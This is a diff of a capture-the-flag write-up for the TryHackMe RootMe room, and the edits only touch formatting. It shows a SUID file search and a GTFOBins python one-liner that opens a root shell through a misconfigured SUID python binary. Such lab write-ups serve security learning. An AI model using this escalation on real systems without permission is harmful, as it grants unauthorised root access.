SavCodes/TryHackMe/RootMe/Full_Attempt.md

 ## Task 4: Privilege Escalation
 "Now that we have a shell, let's escalate our privileges to root."

-Task 4.a directs us to search for "weird" files with SUID permissions so I'll start there
+`Task 4.a` directs us to search for "weird" files with SUID permissions so I'll start there.

 `find / -perm -u=s -type f 2>/dev/null`

-Immediately among the results python stands out as having SUID permissions.
-Let's head over to GTFObins for a command to escalate to root
+Immediately among the results `python` stands out as having SUID permissions.
+Let's head over to GTFObins for a command to escalate to root.
 We find running the following command with SUID permission gives root:
 `python -c 'import os; os.execl("/bin/sh", "sh", "-p")'